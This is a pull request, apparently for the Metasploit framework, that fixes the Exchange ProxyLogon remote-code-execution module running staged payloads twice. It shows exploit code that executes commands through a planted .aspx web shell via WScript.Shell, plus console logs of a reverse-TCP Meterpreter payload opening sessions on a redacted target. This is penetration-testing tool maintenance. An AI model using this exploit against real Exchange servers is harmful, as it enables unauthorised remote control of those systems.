### PR TITLE
Fix Exchange ProxyLogon RCE triggering payload twice

### DIFF
--- a/modules/exploits/windows/http/exchange_proxylogon_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxylogon_rce.rb
@@ -143,7 +143,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    cmd = "Response.Write(new ActiveXObject(\"WScript.Shell\").Exec(\"#{encode_cmd(cmd)}\"));"
+    if !cmd_windows_generic?
+      cmd = "Response.Write(new ActiveXObject(\"WScript.Shell\").Exec(\"#{encode_cmd(cmd)}\"));"
+    else
+      cmd = "Response.Write(new ActiveXObject(\"WScript.Shell\").Exec(\"#{encode_cmd(cmd)}\").StdOut.ReadAll());"
+    end
+
     send_request_raw(
       'method' => 'POST',
       'uri' => normalize_uri(web_directory, @random_filename),

--- a/modules/exploits/windows/http/exchange_proxylogon_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxylogon_rce.rb
@@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    cmd = "Response.Write(new ActiveXObject(\"WScript.Shell\").Exec(\"#{encode_cmd(cmd)}\").StdOut.ReadAll());"
+    cmd = "Response.Write(new ActiveXObject(\"WScript.Shell\").Exec(\"#{encode_cmd(cmd)}\"));"
     send_request_raw(
       'method' => 'POST',
       'uri' => normalize_uri(web_directory, @random_filename),


### PR DESCRIPTION
This fixes the windows/http/exchange_proxylogon_rce exploit executing staged payloads twice, leading to two Meterpreter sessions being opened. The user is usually not dropped straight into either session and has to press CTRL+C to switch to a session.

Cause: `.StdOut.ReadAll()` in `execute_command` makes the the cmd/windows/generic payload work, but with staged payloads, it causes the stage to execute twice.

Before:
```
[*] Preparing the payload on the remote target
[*] Writing the payload on the remote target
[!] Waiting for the payload to be available
[+] Yeeting windows/x64/meterpreter/reverse_tcp payload at XXX.XXX.XXX.XXX:443
[*] Sending stage (200262 bytes) to XXX.XXX.XXX.XXX
[*] Sending stage (200262 bytes) to XXX.XXX.XXX.XXX
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\lAYgH.aspx
[*] Meterpreter session 3 opened (192.168.110.212:31337 -> XXX.XXX.XXX.XXX:8138) at 2021-03-29 18:24:06 -0400
[*] Meterpreter session 4 opened (192.168.110.212:31337 -> XXX.XXX.XXX.XXX:8139) at 2021-03-29 18:24:06 -0400
```

After:
```
[*] Preparing the payload on the remote target
[*] Writing the payload on the remote target
[!] Waiting for the payload to be available
[+] Yeeting windows/x64/meterpreter/reverse_tcp payload at XXX.XXX.XXX.XXX:443
[*] Sending stage (200262 bytes) to XXX.XXX.XXX.XXX
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\vAIV.aspx
[*] Meterpreter session 5 opened (192.168.110.212:31337 -> XXX.XXX.XXX.XXX:8295) at 2021-03-29 18:26:01 -0400
```